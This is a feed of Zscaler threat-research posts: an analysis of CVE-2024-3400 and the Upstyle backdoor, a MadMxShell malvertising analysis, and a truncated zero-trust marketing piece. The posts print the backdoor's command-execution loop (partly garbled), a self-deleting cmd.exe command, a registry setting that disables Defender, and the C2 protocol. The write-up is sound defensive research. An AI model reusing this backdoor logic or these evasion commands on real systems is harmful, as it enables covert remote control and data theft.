Investigación de Seguridad | Blog Categoría Feed Blog de Zscaler — Noticias y opiniones de la voz líder en seguridad en la nube. es-mx A Look at CVE-2024-3400 Activity and Upstyle Backdoor Technical Analysis IntroductionRecently, a zero-day command-injection vulnerability, assigned to CVE-2024-3400, was found in the Palo Alto Networks PAN-OS. It was assigned the maximum severity score of 10.0 and can be exploited by an unauthenticated user to run arbitrary commands on the target system with root privileges.Volexity was the first to identify and report the vulnerability. Since then, the Cybersecurity and Infrastructure Security Agency (CISA) added CVE-2024-3400 to its Known Exploited Vulnerability Catalog.In this blog, we will share the vulnerability exploitation activity observed by Zscaler’s global intelligence network. And, we will examine the recently-discovered Python-based backdoor and its novel interaction mechanism with the operator.Key TakeawaysZscaler’s global intelligence network picked up CVE-2024-3400 activity right after the exploitation script was released.The backdoor utilizes a .pth file for auto-execution and employs a novel indirect interaction with the backdoor by sending commands via error logs and receiving the output through a publicly accessible stylesheet.On the same day the vulnerability was publicly disclosed, a Python-based exploit script was also released to the public on GitHub, making it easier for other threat actors to exploit or test Palo Alto appliances for this vulnerability. Activity Observed by ZscalerZscaler’s global intelligence network picked up activity from various known malicious sources targeting appliances across multiple customers. This activity was picked up almost immediately after the publication of the exploitation script on GitHub. The activity does not appear to target any particular region or industry vertical.Most of the activity observed originated from malicious IPs already known to be associated with vulnerability scanning, Redline Stealer, and EvilProxy. However, one IP stands out from this group. We believe the IP address 67.55.94[.]84 is associated with a VPN provider. No other activity from this IP has been observed. Currently, there is insufficient evidence to attribute this IP to any specific threat actor.Technical AnalysisWe suspect the attackers intended to incorporate Upstyle in their attack sequence. Upstyle, a sophisticated backdoor initially identified by Volexity, employs innovative techniques for persistence, command reception, and output sharing with the operator. Attack flowThe figure below shows how the attack flow would unfold.Figure 1: The possible firewall-based attack chain enabled by the PAN-OS zero-day vulnerability. Upstyle backdoorThe Upstyle backdoor consists of three layers.The first outer layer is the installer which contains the next layer in a base64-encoded format.Layer 1 - InstallerThe installer layer writes the next layer to the following path: /usr/lib/python3.6/site-packages/system.pth. Additionally, it will set the last access time and last modified time of the system.pth file to the same respective time as the installer script.Finally, the installer script deletes itself and the /opt/pancfg/mgmt/licenses/PA_VM`* file.The file path and the extension have special significance. Since the release of Python 3.5, any .pth file under site-packages is run at every Python startup and the lines starting with import (followed by space or tab) are executed, thereby setting up a unique auto-execution mechanism for the malicious code whenever any Python code is run on the system.Layer 2 - LauncherThis layer contains the functional backdoor as another base64-encoded blob of code. It contains two functions named protect and check.protect: This function likely protects the persistence mechanism and makes sure the backdoor stays in the system.pth file. It reads the contents of system.pth and adds a handler for the termination signal. The handler will write back the contents of the system.pth file before terminating. check: This method is called after the protect method. It will check if the process command line contains /usr/local/bin/monitor mp by checking the file /proc/self/cmdline. If it does, the backdoor code will be executed. This could be a way to control the execution of the backdoor and avoid running multiple duplicates of the backdoor thread.Layer 3 - BackdoorOn start, this backdoor will read the content, last access time, and last modified time of the file /var/appweb/sslvpndocs/global-protect/portal/css/bootstrap.min.css so it can be restored later.Then, it goes into an infinite loop and starts monitoring the error log file at /var/log/pan/sslvpn_ngx_error.log looking for one of the following regular expressions: img\[([a-zA-Z0-9+/=]+)\] or img\{base64encoded_command}\ as shown in the code snippet below.When the pattern is found, the command is base64 decoded, executed, and the output is appended to the bootstrap.min.css file inside the comment tags, /* {command output here} */.Finally, the log file is purged of the attacker’s generated error logs containing the malicious commands, and the error-log-file timestamps are restored. After 15 seconds the content and timestamps of the bootstrap.min.css file are also restored.-- [snip] -- css_path = '/var/appweb/sslvpndocs/global-protect/portal/css/bootstrap.min.css' content = open(css_path).read() atime=os.path.getatime(css_path) mtime=os.path.getmtime(css_path) while True: try: SHELL_PATTERN = 'img\[([a-zA-Z0-9+/=]+)\]' lines = [] WRITE_FLAG = False for line in open("/var/log/pan/sslvpn_ngx_error.log",errors="ignore").readlines(): rst =,line) if rst: WRITE_FLAG = True cmd = base64.b64decode( try: output = os.popen(cmd).read() with open(css_path,"a") as f: f.write("/*"+output+"*/") except Exception as e: pass continue lines.append(line) if WRITE_FLAG: atime=os.path.getatime("/var/log/pan/sslvpn_ngx_error.log") mtime=os.path.getmtime("/var/log/pan/sslvpn_ngx_error.log") with open("/var/log/pan/sslvpn_ngx_error.log","w") as f: f.writelines(lines) os.utime("/var/log/pan/sslvpn_ngx_error.log",(atime,mtime)) import threading threading.Thread(target=restore,args=(css_path,content,atime,mtime)).start() except: pass time.sleep(2) -- [snip] --- ConclusionCVE-2024-3400 is a high severity vulnerability. There was an uptick in malicious activity soon after an exploit script was released to the public on GitHub.The founding principles of the Zero Trust Exchange Platform™, a zero trust architecture, and Defense-in-Depth (DiD) should be used in combination to defend against such attacks. In addition to deploying detection rules and monitoring for suspicious activity in environments, security teams should also adopt deception engineering. Strategic use of this technology can make it difficult for the adversary to move in the environment without tripping alerts.Indicators Of Compromise (IOCs)Vulnerability scan originating IPsIPComment23.227.194.230Known Malicious IP154.88.26.223Known Malicious IP206.189.14.205Known Malicious IP67.55.94.84SaferVPN IPSHA256 Hashesab3b9ec7bdd2e65051076d396d0ce76c1b4d6f3f00807fa776017de88bebd2f33de2a4392b8715bad070b2ae12243f166ead37830f7c6d24e778985927f9caac949cfa6514e499e28aa32feba800181558e60455b971206aa5aa601ea1f55605710f67d0561c659aecc56b94ee3fc82c967a9647c08451ed35ffa757020167fb Wed, 17 abr 2024 18:11:50 -0700 Atinderpal Singh Malvertising campaign targeting IT teams with MadMxShell IntroductionBeginning in March of 2024, Zscaler ThreatLabz observed a threat actor weaponizing a cluster of domains masquerading as legitimate IP scanner software sites to distribute a previously unseen backdoor. The threat actor registered multiple look-alike domains using a typosquatting technique and leveraged Google Ads to push these domains to the top of search engine results targeting specific search keywords, thereby luring victims to visit these sites. The newly discovered backdoor uses several techniques such as multiple stages of DLL sideloading, abusing the DNS protocol for communicating with the command-and-control (C2) server, and evading memory forensics security solutions. We named this backdoor “MadMxShell” for its use of DNS MX queries for C2 communication and its very short interval between C2 requests. In this blog, we will examine the campaign details, threat actor's infrastructure, and a detailed technical analysis of the backdoor. We have also shared a custom Python script to decode C2 traffic for malware samples and all the Indicators of Compromise (IOCs) linked to this campaign. Key Takeaways Between November 2023 and March 2024, multiple domains were registered by a threat actor spoofing legitimate IP scanners and other software typically used by IT security and network administration teams in enterprises. The threat actor abused Google Ads to conduct a malvertising campaign in an attempt to push their malicious sites to the top of search results. A successful infection results in the delivery of a previously unseen backdoor that we named “MadMxShell”. The backdoor uses techniques such as multiple stages of DLL sideloading and DNS tunneling for command-and-control (C2) communication as a means to evade endpoint and network security solutions, respectively. In addition, the backdoor uses evasive techniques like anti-dumping to prevent memory analysis and hinder forensics security solutions. BackgroundThe selection of spoofed software by this threat actor suggests that their targets primarily consist of IT professionals, particularly those in IT security and network administration roles. This aligns with the recent trend observed where advanced persistent threat (APT) groups, such as NOBELIUM, crafted attacks targeting these teams. With their privileged access to internal systems and networks, IT security and network management teams are attractive targets for both APT groups and initial access brokers (IABs) that sell access to compromised networks. Although we have not yet attributed the attack described in this blog to a specific threat actor, it is important to highlight this emerging trend. Threat actors have previously leveraged Google malvertising to distribute trojanized versions of a specific port scanning tool called Advanced IP Scanner, as described in reports by Kaspersky, BlackBerry, and Huntress. Although the campaign discussed in this blog uses a similar distribution method, the range of spoofed software has been expanded beyond Advanced IP Scanner. Furthermore, to the best of our knowledge, the final malware delivered in this campaign has not been publicly documented before. Due to these significant differences, we assess with a high-confidence level that this campaign was conducted by a different threat actor. Attack ChainThe figure below illustrates the multi-stage attack chain at a high level. Figure 1: The MadMxShell end-to-end attack-chain, which starts with malvertising, followed by multiple intermediate stages of DLL sideloading, and finally DNS tunneling to the C2 server. Technical AnalysisIn the following section, we provide a detailed analysis for each stage of the attack chain. Google malvertising campaignThe modus operandi of the threat actor includes registering multiple look-alike domains spoofing popular port scanning software and pushing them to the top of Google search results by running Google Ads campaigns. This technique is widely known as malvertising. During our investigation, we observed users being served these ads when they searched for keywords related to any of the following: Any of the legitimate port scanning and IT management software spoofed by this threat actor Advanced IP Scanner Angry IP Scanner PRTG IP Scanner by Paessler Manage Engine Network admin tasks related to virtual local area networks (VLANs) Scanning IP protocol The figure below shows details of the Google Ads campaign carried out by the threat actor in March 2024 for one of the malicious domains. The domain in question was advanced-ip-scanz[.]net, and the search keywords were: "advanced ip scanner" "ip address scanner" Figure 2: Details of the Google Ads campaign in March 2024 for the malicious domain advanced-ip-scanz[.]net. Once the user clicks on any of the attacker-controlled Google Ads, they are redirected to a look-alike site for the corresponding IP scanning software. Malicious sitesThe threat actor registered multiple sites masquerading as legitimate IP and port scanner software programs. One such site we observed is advansed-ip-scanner[.]net, which is a look-alike site of the legitimate Advanced IP scanner software www.advanced-ip-scanner[.]com. The complete source code of the fraudulent website mirrors the legitimate site, with the exception of minor edits made by the threat actor to JavaScript (JS) code which redirects the user to download a malicious file when they click the download button. The figure below shows a comparison between the altered JS code from the malicious file and the original legitimate website. The createFunctionWithTimeout function was modified to redirect users to download a malicious ZIP archive file from the following URL: advansed-ip-scanner[.]net/yftyudruo.php. Figure 3: JavaScript code comparison between the legitimate website’s createFunctionWithTimeout function and the malicious website's code. Backdoor Details - Binary AnalysisStage 1 injectorThe analysis in this blog is based on this ZIP archive: (SHA256:7966ee1ae9042e7345a55aa98ddeb4f39133216438d67461c7ee39864292e015). The ZIP archive contains two files: Advanced-ip-scanner.exe: A renamed copy of the legitimate Microsoft EXE oleview.exe. IVIEWERS.dll: A 22 MB DLL, which contains the stage two payload. This DLL is padded with an unused overlay of 10 MB which prevents scanning by security products that limit the size of analyzed files. When Advanced-ip-scanner.exe is run, it sideloads IVIEWERS.dll which executes a series of heavily obfuscated shellcodes extracted from various locations within the .rsrc section of the DLL. The final shellcode extracts and decodes an executable file with the XOR key 5dsadas435235bgdsgdfbvb3253453425345gfdsgfdgdf from resource AT21 of the DLL and injects it into a new Advanced-ip-scanner.exe process via process hollowing. Stage 2 dropperThe injected EXE file contains the next stage payloads in resource ID 202, encoded with a hardcoded 8-byte XOR key F2 09 CD 2D 85 CD 1D A3 and compressed with zlib. Each encoded byte in this resource is padded with seven null bytes, resulting in a 10MB file, likely as another anti-scanning technique. This is shown in the figure below. Figure 4: The encoded and compressed stage 3 payload in the resource. After decoding and decompressing the resource, two files, OneDrive.exe and Secur32.dll, are dropped into %LOCALAPPDATA%\Microsoft\OneDrive\Update. The dropper deletes the stage 1 EXE with the following command before executing the dropped OneDrive.exe with ShellExecuteExW: cmd.exe /C for /l %x in (0,0,0) do (ping -n 3 > NUL & for %p in ("<PATH>\Advanced-ip-scanner.exe") do (del /f /q %p & if not exist %p exit))Stage 3 launcherOneDrive.exe, a legitimate signed Microsoft EXE, is abused to sideload Secur32.dll which sets up persistence for OneDrive.exe before executing the embedded stage 4 shellcode. Data from Secur32.dll’s icon resource ID 202 is XOR decoded to obtain the stage 4 shellcode. This is shown in the figure below. Figure 5: The icon resource with the encoded stage 4 payload. The first 16 bytes of the resource contain an encoded key for the payload that follows it. Each of the first 8 lowercase characters (onedrive) of the current process filename is added to every second byte of the encoded key to derive the XOR key F2 78 CD 9B 85 32 1D 07 33 C4 A0 21 98 A2 95 E3, as shown in the figure below. This prevents the correct decoding of the next stage payload if Secur32.dll was not sideloaded by OneDrive.exe. Figure 6: Generating the XOR key to decode the stage 3 shellcode. The malware then attempts to disable Windows Defender by setting HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware to 1 in the registry. It configures a scheduled task named “OneDrive Update” that executes %LOCALAPPDATA%\Microsoft\OneDrive\Update\OneDrive.exe when the current user logs on to Windows before redirecting to the next stage. Stage 4 backdoorThe shellcode is a backdoor that allows the threat actor to collect system information, execute commands via cmd.exe, and perform basic file manipulation operations such as reading, writing, and deleting files. To deter analysis and detection, the malware decodes the code of each function with an 8-byte XOR key F2 09 CD 2D 85 CD 1D A3 (same key used in stage 2), calls the function, and then immediately re-encodes the code. In the figure below, the code excerpt on the right is decoded from the original bytes on the left. We can observe that even after decoding, it still needs to perform an additional step of decoding the get_c2_domain function before it can call it. The function code is re-encoded back to its original state before execution continues. This ensures that there is never a fully decoded copy of the shellcode in memory at any point of execution. Most sensitive strings and data, such as the C2 domain, lookup table for encoding/decoding C2 communications, and aforementioned XOR key, are also stored as stack strings to hinder analysis. Figure 7: Function bytes before and after decoding. Note that the decoded function includes calls to decode and encode other functions called within it. The malware generates a 4-byte session ID with the CryptGenRandom API and a victim ID by concatenating the hard disk serial number, computer name, and username, and taking the first 8 bytes of its MD5 hash. C2 ProtocolThe malware communicates with the C2 server, litterbolo[.]com, by sending requests and receiving commands encoded within DNS MX queries and responses. The malware supports the requests described in the table below. TypeNameDescription0HeartbeatIndicates that the malware is ready to accept the next command.1RegistrationSent as the first request of a session or when the C2 issues a re-registration command (type 1 command).2Command acknowledgementAcknowledges the receipt of C2 commands.4System info command resultContains system information collected for type 4 commands.5Shell command resultContains shell output for type 5 commands.6File command resultContains file and/or directory data for type 6 commands.Table 1: A table describing the requests supported by the malware during C2 communication. Figure 8: A diagram depicting the MadMxShell C2 communication loop. For each session, the malware first sends a registration request (type 1) to the C2 server. Once the C2 server acknowledges the registration request, the malware sends a heartbeat request (type 0) to the C2 server. The C2 server will respond with any of the following commands from the table below. Command TypeSubcommandDescription0N/ASends a heartbeat.1N/ARe-register with C2.2N/AC2 acknowledges receipt of specified packet and indicates that the malware should send the next packet (for request messages split into multiple packets). 4N/ACollects system information, like: Computer name User name Ethernet IP addresses Windows OS version Processor name Display card name RAM size 50Start cmd.exe process.1Terminate cmd.exe process.2Execute command via existing cmd.exe process created with subcommand ID 0.60List files and directories if path is specified, otherwise list all drives.1Write or append content to file.2Read from file.3Delete file or directory. Files are deleted with the DeleteFileW API, while directories are deleted with this command: cmd.exe /c rmdir "<DIR_NAME>" /s /q.Table 2: The commands and subcommands supported by the malware. The malware then acknowledges the command with a command acknowledgement request (type 2) before executing the specified command. After completing the commands for types 4, 5, and 6, the malware sends the results to the C2 server. The malware then repeats the entire process by sending a heartbeat request (type 0) to retrieve the next command. Data Encoding The malware sends requests to the C2 server by encoding the data in the subdomain(s) of the Fully Qualified Domain Name (FQDN) in a DNS MX query packet. The C2 responds similarly by encoding its commands as subdomain(s) in the corresponding DNS MX response packet. Each byte of binary data is converted into a pair of alphanumeric characters using a custom encoding scheme involving a hardcoded 36-character lookup table. Blocks of 60 alphanumeric characters are separated by a “.” character to represent a subdomain name. Python code for decoding these subdomains into the original request and C2 messages can be found in our GitHub repository. Because the malware uses a maximum of 224 characters for the FQDN and the C2 domain name cannot be used to encode data, each DNS packet can only transfer up to 103 bytes. Requests and commands that exceed this size are split into multiple DNS packets and are sent sequentially after the other party has acknowledged receipt of the previous packet. Possibly due to the limited bandwidth of the C2 protocol, this malware is configured with relatively short intervals (3 seconds) between requests. Because of this, its C2 traffic is significantly more noisy than the typical malware utilizing HTTP for C2 communication. Commands received from the C2 (after decoding) are structured as shown in the table below. OffsetLengthNameDescription0x04Query numberStarts from 0 per session.0x44ChecksumAdler-32 checksum of entire message data.0x84Packet numberA single message may be split into multiple packets. Starts from 0 for each message.0xC4Message lengthTotal length of the message. This field is only present in the first packet of a message.0x10VariesMessage dataThe first byte of the message contains the command ID. The structure of subsequent bytes differs slightly for each command type.Table 3: The C2 message structure. For example, the C2 server for this sample always responds with upon receiving a registration request. This is decoded as 00 00 00 00 03 00 0f 00 00 00 00 00 05 00 00 00 02 00 00 00 00 and represents the following message: Query number: 0 Checksum: 0xF0003 Packet number: 0 Message length: 5 Data: 02 00 00 00 00 (this is an acknowledgement from the C2 that it received packet 0) Likewise, the requests sent to the C2 server (before encoding) are structured as shown in the table below. OffsetLengthNameDescription0x04Session IDAn ID randomly generated when the malware is started.0x48Victim IDThe first 8 bytes of an MD5 hash of the hard disk serial number, computer name, and user name.0xc4Query numberStarts from 0 per session and is incremented for each DNS query sent to the C2 server.0x104ChecksumThe Adler-32 checksum of entire message data.0x144Packet numberA single message may be split into multiple packets. Starts from 0 for each message.0x184Message lengthTotal length of the message. This field is only present in the first packet of a message.0x1cVariesMessage dataThe first byte of the message contains the request type. Data for the specific request follows it (for example: system information for request type 4).Table 4: The request message structure. Observed CommandsDuring our investigation, we observed the backdoor receiving the following commands from the C2 server: Collect system information (command type 4). Run systeminfo and ipconfig via cmd.exe (command type 5). Enumerate drives and specific directories, particularly the Windows system directory and user directories (command type 6). Some of the commands were received 60 mins to 90 mins after the backdoor registered with the C2 server, which may indicate an anti-analysis technique to defeat sandboxes or actual hands-on activity by the threat actor. Based on the capabilities of the stage 4 backdoor and the commands collected, we believe the attacker is likely interested in harvesting and exfiltrating information from infected machines. By focusing on IT teams, this threat actor can target users that have privileged access to sensitive systems (e.g., domain controllers) that can lead to a significant breach. Infrastructure DetailsOur analysis started with the domain, advansed-ip-scanner[.]net, that was live at the time of analysis and was serving a payload. WHOIS information for this domain revealed the attacker's email address used for registration to be [email protected]. A quick reverse WHOIS lookup using this email address revealed 45 domains registered between November 2023 and March 2024 to spoof various network scanning and IT management software. The complete list of domains used for malware distribution is provided in the IOCs section at the end of this blog. These domains were hosted on servers exclusively abused by the threat actor and belonged to the ASNs below: AS208312 (REDBYTES, RU) AS16276 (OVH, FR) The C2 domain litterbolo[.]com used a dedicated nameserver since the malware abused the DNS protocol for C2 communication. OSINT ResearchUpon further Open-Source Intelligence (OSINT) research, we discovered two accounts created by the threat actor on criminal underground forums like blackhatworld[.]com and social-eng[.]ru using the email address [email protected]. On the blackhatworld[.]com forum, the threat actor made two posts in a thread related to someone offering methods to bypass the Google Adsense threshold. This aligns with the Google Ads abuse technique used by the threat actor to launch their own malvertising campaign. The figures below show two posts made by the threat actor on blackhatworld[.]com expressing interest in this technique and asking to enroll in the course. Figure 9: Posts made by the threat actor showing interest in the Google Ads abuse course. Google Ads threshold accounts and techniques for abusing them are often traded on BlackHat forums. Many times they offer a way for the threat actor to add as many credits as possible to run Google Ads campaigns. This allows the threat actors to run campaigns without actually paying until the threshold limit. A reasonably high threshold limit lets the threat actor run the ad campaign for a significant amount of time. Once the threshold has reached, they can use the same technique with a new Google Ads account to repeat the process. Threat actors often use virtual credit cards (VCC) along with residential proxies to verify these Google Ads accounts and employ various methods to use them up to the maximum threshold. This approach effectively enables threat actors to run long lasting malvertising campaigns with a low investment and also avoid account suspension. ConclusionThe threat discussed in this blog demonstrates advanced tactics, techniques, and procedures (TTPs), displaying a keen interest in targeting users in the IT security and network administration teams. The threat actor put significant effort into remaining undetected by evading memory forensics and network security controls. While we cannot currently attribute this activity to any known threat actor, we continue to monitor any new developments associated with this threat actor and ensure the necessary protections are in place for our customers against these threats. We also suggest users follow security best practices and exercise caution when clicking on links appearing in Google search engine results. Users must also ensure to download software only from the official website of the developer. Zscaler CoverageFigure 10: Zscaler sandbox detection report In addition to sandbox detections, Zscaler’s multilayered cloud security platform detects indicators related to MadMxShell at various levels with the following threat names: Win32.Backdoor.MadMxShell Indicators Of Compromise (IOCs)File indicatorsSHA256 HashFilenameDescription7966ee1ae9042e7345a55aa98ddeb4f39133216438d67461c7ee39864292e015Advanced-ip-scanner.zipThe ZIP archive contains Advanced-ip-scanner.exe and OneDrive.exe, served by the malicious sites.0263663c5375289fa2550d0cff3553dfc160a767e718a9c38efc0da3d7a4b626Advanced-ip-scanner.exeThe original filename is oleview.exe, a legitimate binary from Microsoft that is vulnerable to DLL sideloading.722a44f6a4718d853d640381e77d1b9815d6f1663603859ff758ded896860cbaIVIEWERS.dllThe malicious DLL sideloaded by oleview.exe.bae2952c7d120d882746658e6d128556ae2498005072c4b7d7590a964b93c315 The IVIEWERS.dll without overlay.6de01c65c994e0e428f5043cb496c8adca96ba18dfd2953335d1f3c9b97c60c5 The stage 2 dropper EXE.9bba4c707de5a66d8c47e3e18e575d43ba8011302dad452230c4b9d6b314ee26OneDrive.exeThe legitimate binary from Microsoft that is vulnerable to DLL sideloading.287a0a80a995f1e62b317cf5faa1db94af6ee9132b0f8483afbd6819aa903d31Secur32.dllThe malicious DLL sideloaded by OneDrive.exe.b5162497bc2b9f1956d2145dd32daa5c99d6803544a0254a9090237628168d94 The icon resource ID 202 in the Secur32.dll which contains the encoded stage 4 backdoor.105e9a8d1014d2939e6b0ada3f24ad4bb6bd21f0155c284c90c7675a1de9d193 The stage 4 backdoor. Network indicators Malware distribution sites advaanced-ip-scanner[.]com advaanced-ip-scanner[.]net advanceb-ip-scanner[.]com advanceb-lp-scanner[.]com advanced-ip-saaner[.]com advanced-ip-scaaner[.]com advanced-ip-scaer[.]com advanced-ip-scaer[.]net advanced-ip-scanel[.]com advanced-ip-scanel[.]net advanced-ip-scanerr[.]com advanced-ip-scanerr[.]net advanced-ip-scanir[.]com advanced-ip-scanir[.]net advanced-ip-scanr[.]com advanced-ip-scanr[.]net advanced-ip-scanz[.]com advanced-ip-scanz[.]net advanced-lp-saanel[.]com advanced-lp-saaner[.]com advanced-lp-scanel[.]com advanced-lp-scannel[.]com advansed-ip-scanner[.]com advansed-ip-scanner[.]net advvanced-ip-scanner[.]com advvanced-ip-scanner[.]net angryipscan[.]net angryipscaner[.]com ipscannerprtg[.]com keystore-explore[.]com manageeengines[.]com manageeengines[.]net managengines[.]com managengines[.]net managengins[.]com managengins[.]net networkipscan[.]com networkscanip[.]com paesslers[.]com prtgscan[.]com C2 serverlitterbolo[.]com Google Ads linksDateGoogle Ads linkDestinationMarch 5th 2024www.googleadservices[.]com/pagead/aclk?sa=L&ai=DChcSEwiN35j_vN2EAxUzGYMDHX4hA34YABABGgJzZg&ae=2&gclid=CjwKCAiAopuvBhBCEiwAm8jaMSAMzoon4dwGsotmQqrkJiOZVKq2nqUgh4h5tTNSLoOP21tibW_TXhoCmoYQAvD_BwE&[.]comMarch 5th 2024www.googleadservices[.]com/pagead/aclk?sa=L&ai=DChcSEwiStfbWpN6EAxVNS38AHbFZBN4YABACGgJvYQ&ase=2&gclid=EAIaIQobChMIkrX21qTehAMVTUt_AB2xWQTeEAAYAyAAEgILlvD_BwE&[.]comMarch 8th 2024www.googleadservices[.]com/pagead/aclk?sa=L&ai=DChcSEwjdlN6o3-SEAxVxgoMHHfe-BLIYABACGgJlZg&ase=2&gclid=CjwKCAiAi6uvBhADEiwAWiyRdhpRojhqTPETT3LIoSFRMYLK6PuHStezGHN2xQlXKluURhxieDQGLxoCrdkQAvD_BwE&[.]com MITRE ATT&CK FrameworkIDTacticDescriptionT1583.001Acquire Infrastructure: DomainsThe threat actor registered typosquatting domains and set up fake websites masquerading as legitimate software websites to deliver malware.T1583.002Acquire Infrastructure: DNS ServerThe threat actor configured a DNS server at litterbolo[.]com for C2 communication.T1583.008Acquire Infrastructure: MalvertisingThe threat actor leveraged Google malvertising, targeting search keywords related to IP and port scanners to lure users to visit malicious sites.T1204.002User Execution: Malicious FileThe attack chain is started by the user when they execute the fake Advanced-ip-scanner.exe file.T1574.002Hijack Execution Flow: DLL Side-LoadingThe threat actor leveraged two stages of DLL sideloading to execute the final payload.T1055.012Process Injection: Process HollowingThe threat actor employs process hollowing to inject and execute the stage 2 dropper EXE file.T1562.001Impair Defenses: Disable or Modify ToolsThe stage 3 launcher attempts to disable Windows Defender.T1070.004Indicator Removal: File DeletionThe stage 2 dropper runs a command via cmd.exe to delete the stage 1 EXE from disk.T1053.005Scheduled Task/Job: Scheduled Task The stage 3 launcher configures for persistence by masquerading as a scheduled task. T1036.004Masquerading: Masquerade Task or ServiceThe scheduled task masquerades as a OneDrive update to execute OneDrive.exe for malware persistence.T1036.005Masquerading: Match Legitimate Name or LocationOneDrive.exe and Secur32.dll are dropped to a subdirectory of %LOCALAPPDATA%\Microsoft\OneDrive, which is used by the legitimate OneDrive application.T1027.001Obfuscated Files or Information: Binary Padding IVIEWERS.dll is padded with 10 MB of null bytes to inflate the file size. This tactic can be used to evade security products that have a file size limit for analysis.T1027.007Obfuscated Files or Information: Dynamic API ResolutionMultiple stages use ROR13 API hashing based on the uppercase names of the APIs.T1027.009Obfuscated Files or Information: Embedded PayloadsThe next stage payloads are XOR encoded in the resources of stages 1 to 3.T1082System Information Discovery MadMxShell’s C2 command types 4 and 5 were utilized to enumerate system information and transmit data to the attacker’s C2 server.T1083File and Directory DiscoveryMadMxShell’s C2 command type 6 was utilized to enumerate files and directories on the infected machine.T1033System Owner/User DiscoveryMadMxShell sends the current username as part of the information collected by command type 4.T1005Data from Local SystemMadMxShell can read files on the infected machine when the C2 command type 6 is issued.T1071.004Application Layer Protocol: DNSMadMxShell abuses the DNS MX queries to establish C2 communication with the C2 server.T1132.002Data Encoding: Non-Standard EncodingC2 traffic uses custom encoding based on a lookup table.T1572Protocol TunnelingThe C2 protocol encodes data within MX queries and responses of the DNS protocol.T1041Exfiltration Over C2 ChannelThe collected data is exfiltrated via C2 communications.AppendixVisit our GitHub repository to access the Python script to decode C2 traffic. Wed, 17 abr 2024 08:25:13 -0700 Roy Tay Another CVE (PAN-OS Zero-Day), Another Reason to Consider Zero Trust A Year of Critical Zero Days: Firewalls, VPNs, and more This past year has been, in many ways, the year of zero-day vulnerabilities for externally exposed assets — a trend that has laid bare some of the fundamental weaknesses of legacy architectures. In the past twelve months, we have witnessed back-to-back disclosures of zero-day vulnerabilities for critical assets that provide core access to the network — specifically VPNs and Firewalls. Today, CVE-2024-3400 was added to this list. This is a critical command injection vulnerability impacting Palo Alto Network’s PAN-OS software used in its GlobalProtect Gateway, which is a firewall service that facilitates VPN connectivity, among other things. The vulnerability has a CVSS score of 10.0, the maximum possible severity, because it is exploitable by an unauthenticated user. For particular PAN-OS versions and feature configurations, this flaw may allow attackers to execute arbitrary code with root privileges on the firewall. According to Palo Alto Networks, this vulnerability is being actively exploited in the wild. No individual vendor can be immune from vulnerabilities. However, what these zero-day attacks show is that legacy VPN & firewall-based architectures are vulnerable to a single point of failure, creating significant risk for organizations. One of the key differentiators of a true Zero Trust Architecture, meanwhile, is that it can dramatically reduce the attack surface of an organization. This is by making enterprises’ assets, applications, servers, devices, and more invisible to attackers — hiding them behind a cloud-proxy architecture — while entirely eliminating the need for such VPN and firewall products that are such frequent targets for attack. Attack Chain Figure 1: The possible firewall-based attack chain enabled by the PAN-OS zero-day vulnerability. Attack ScenarioThe following attack scenario was compiled from several documented real-world execution cases against CVE-2024-3400 and represents one possible path for attackers. Initial Exploitation: the attackers scan for and exploit the command injection vulnerability. Persistence: use Cron job to download additional tools, including UPSTYLE, a python-based backdoor, and reverse proxy tools such as GOST (GO Simple Tunnel). Execution: Download and Execute commands from remote location by piping wget output to bash. Lateral Movement: in at least ‌one case, attackers pivoted internally across the affected networks via SMB and WinRM. Collection: the adversary attempted to obtain the domain backup DPAPI keys and targeted active directory credentials by obtaining the NTDS.DIT file. They further targeted user workstations to steal saved cookies and login data, along with users’ DPAPI keys. Next, the attacker copied configuration data from the firewall device. Additionally, Login data, cookies, and local state data for Chrome and Microsoft Edge were also compromised. This enabled the attacker to obtain the browser master key and decrypt sensitive data. Exfiltration: The stolen data files were saved to an externally accessible web directory for later retrieval by the attacker. Vendor RecommendationsUpdate 04/15/24: In response to this risk, Palo Alto Networks advises customers to apply hotfixes as soon as they are available. As of Apr 15, 2024, the following hotfixes are released: PAN-OS 10.2.9-h1, PAN-OS 11.0.4-h1, PAN-OS 11.1.2-h3. Customers are advised to temporarily disable device telemetry as an alternative mitigation of this vulnerability until the device is upgraded to a fixed PAN-OS version. Hotfixes for other commonly deployed maintenance versions are expected in the next 1-4 days. In response to this risk, Palo Alto Networks advises customers to temporarily disable device telemetry as an alternative mitigation of this vulnerability until the device is upgraded to a fixed PAN-OS version. Moreover, customers should monitor the network for any suspicious activity and follow security best practices. Affected VersionsVersion Affected Versions PAN-OS 11.1 < 11.1.2-h3 PAN-OS 11.0 < 11.0.4-h1 PAN-OS 10.2 < 10.2.9-h1 The problem is legacy technologyThe GlobalProtect vulnerability is the latest in a long line of VPN and Firewall-related security flaws. It’s April, and we have already seen critical CVEs for Ivanti, Sonicwall, FortiNet, and Cisco VPN solutions. This shows that the problem is not the vendor, but the vulnerable technology-driven legacy architecture that makes it a prime target for threat actors. VPNs were first used in 1996, a time when many of today’s complex and sophisticated cyberattacks did not exist. Traditional firewalls have been around even longer. Nearly three decades later, threat actors are still regularly finding ways to exploit these technologies. These assets expose organizations to enormous risk due to the fact that: They are externally exposed — ‘if it's reachable, it's breachable’ Their flawed architecture provides a beachhead into the corporate environments leading to lateral propagation, data exfiltration, compromising the entire environment. The fundamental problem with VPNs and firewalls is they create a public-facing point of contact to the outside world. They present sophisticated threat actors an opportunity to attack your organization until they discover a way in — think zero-day vulnerabilities. They bring both your users as well as threat actors (in the event of a successful exploit) onto your network. Given the potential reward from a successful exploit, we will continue to see threat actors targeting VPNs and firewalls. Recent zero-day vulnerabilities in exposed VPNs and firewalls One recent case of legacy architecture leading to zero-day exploits are the Ivanti vulnerabilities disclosed in December 2023. Multiple zero-day vulnerabilities in Ivanti’s VPN products were exploited by Chinese state-backed hackers taking advantage of flaws described in CVE-2023-46805 and CVE-2023-21887. The adversaries used these vulnerabilities to perform authentication bypass and remote command injection. Once these flaws were patched, attackers bypassed the fixes by leveraging other vulnerabilities (CVE-2024-21888). The workarounds used to circumvent the initial patch allowed attackers to enable privilege escalation and perform server-side request forgery. In February 2024, CISA released another VPN-related alert about an attack on Cisco’s Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD). In this case, the Akira ransomware group exploited a vulnerability (CVE-2020-3259) to steal information by leveraging misconfigured instances of WebVPN/AnyConnect. These repeated zero day attacks on VPN show that the real issue is the outdated architecture, not the specific vendors involved. How zero-day threats enable the four-stage attack sequence Enterprises should understand that attackers target vulnerabilities in their exposed, internet-connected assets. This includes firewalls and 